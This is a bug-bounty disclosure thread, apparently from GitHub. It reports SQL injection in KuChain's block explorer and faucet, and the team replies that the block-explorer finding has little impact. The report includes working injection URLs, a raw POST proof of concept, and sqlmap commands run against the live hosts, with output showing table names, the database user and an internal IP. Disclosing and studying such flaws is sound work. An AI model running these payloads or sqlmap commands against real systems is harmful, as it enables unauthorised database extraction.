Pisces-Anjou
commented
4 years ago Hi,
Thanks for your submission. We have tested the issue you mentioned and did notice it.
Kindly note that all the data of KuChain is public data. An attacker can get all the public data by SQL Injection attacks, but it will not cause any practical impact on the chain. we admit this is a small oversight. Thanks for your reminder.
As what I have said above, there won't be any practical impact delivered by the issue you mentioned, it will not affect the normal operation of the chain, and it is not in the scope from P1 to P4. After evaluation, we consider it is not a valid vulnerability but it does a good improve suggestion.
Thanks for your attention and contribution! Please keep trying and help us improve our chain.
Regards KuChain Team
Block Explorer Web Application - SQL Injection Vulnerability
User submitted values were dynamically included in SQL statements without thorough sanitisation of special characters. SQL queries created in this way are often vulnerable to SQL Injection attacks. An attacker can leverage this issue to directly affect the SQL query syntax, potentially leading to the disclosure of database information, or even a compromise of the hosting server itself.
Vulnerable URL - https://explorer.kuchain.network
Vulnerable page and parameter
Steps to reproduce the behavior:
Open one of the following URLs in a web browser and notice the database error
https://explorer.kuchain.network/testNet/db/v1/plugin/tx_list?_t=1594723901489&block_height=&limit=10&msg_coin_creator=&msg_coin_symbol=&msg_receiver=&msg_sender=%27%7c%7ccast((select%20chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))%20as%20numeric)%7c%7c%27&msg_type=&page=1&transfer_condition=and&tx_status=all
https://explorer.kuchain.network/testNet/db/v1/plugin/coin_list?_t=1594723888078&limit=10&page=1&symbol=%27%7C%7Ccast((select%20chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(53)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97))%20as%20numeric)%7C%7C
Now run the following sqlmap command to extract the full database
./sqlmap.py -u "https://explorer.kuchain.network/testNet/db/v1/plugin/coin_list?_t=1594723888078&limit=10&page=1&symbol=1" --dbms=PostgreSQL --banner --random-agent -p symbol --dump
_[14:10:03] [INFO] the back-end DBMS is PostgreSQL [14:10:03] [INFO] fetching banner [14:10:04] [INFO] retrieved: 'PostgreSQL 12.3 (Debian 12.3-1.pgdg100+1) on x86_64-pc-linux-gnu, compiled by gcc (Debian 8.3.0-6) 8.3... web application technology: Nginx back-end DBMS operating system: Linux Debian back-end DBMS: PostgreSQL banner: 'PostgreSQL 12.3 (Debian 12.3-1.pgdg100+1) on x86_64-pc-linux-gnu, compiled by gcc (Debian 8.3.0-6) 8.3.0, 64-bit' [14:10:09] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries [14:10:09] [INFO] fetching current database [14:10:10] [INFO] retrieved: 'public' [14:10:10] [WARNING] on PostgreSQL you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes [14:10:10] [INFO] fetching tables for database: 'public' [14:10:12] [INFO] retrieved: 'events' [14:10:12] [INFO] retrieved: 'messages' [14:10:13] [INFO] retrieved: 'transfer' [14:10:14] [INFO] retrieved: 'block' [14:10:15] [INFO] retrieved: 'err_table' [14:10:16] [INFO] retrieved: 'account' [14:10:17] [INFO] retrieved: 'acccoins' [14:10:17] [INFO] retrieved: 'blockinfo' [14:10:18] [INFO] retrieved: 'coins' [14:10:19] [INFO] retrieved: 'delegation' [14:10:20] [INFO] retrieved: 'delegation_change' [14:10:21] [INFO] retrieved: 'lockacccoins' [14:10:22] [INFO] retrieved: 'txmsgs' [14:10:22] [INFO] retrieved: 'validator' [14:10:23] [INFO] retrieved: 'tx' [14:10:24] [INFO] retrieved: 'sync_stat' [14:10:24] [INFO] fetching columns for table 'txmsgs' in database 'public' [14:10:26] [INFO] retrieved: '_from' [14:10:27] [INFO] retrieved: 'text' [14:10:27] [INFO] retrieved: 'to' [14:10:28] [INFO] retrieved: 'text' [14:10:29] [INFO] retrieved: 'action' [14:10:30] [INFO] retrieved: 'text' [14:10:31] [INFO] retrieved: 'amount'
etc
Contact Information
m.avram.g@gmail.com
Note that this flaw should be fixed asap. Also, I think you better restrict public access to the API Swagger https://explorer.kuchain.network/testNet/
Kind Regards
EDIT 1:
Seems that the main site have the same issue
KuChain Betanet Faucet - Blind SQL Injection Vulnerability
Vulnerable URL: https://kuchain.network/faucet Vulnerable Parameter: receiver
Method: POST
POC:
POST /portal-web/api/applyForTestFunds?lang=en_US HTTP/1.1 Host: kuchain.network User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: application/json Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://kuchain.network/faucet Content-Type: multipart/form-data; boundary=---------------------------91872151416297495583940013683 Origin: https://kuchain.network Content-Length: 217 Connection: close
-----------------------------91872151416297495583940013683 Content-Disposition: form-data; name="receiver"
SQLINJECTION -----------------------------91872151416297495583940013683--
Using again sqlmap command line tool to extract sensitive information.
_./sqlmap.py -u 'https://kuchain.network:443/portal-web/api/applyForTestFunds?lang=en_US' --data='receiver=test' --dbs --banner --random-agent --risk=3 --level=3 -p receiver_
user : kuchain@172.31.186.12 database: jsapi version: MySQL 8.0.18 database file location: /home/mysql/data/db
Regards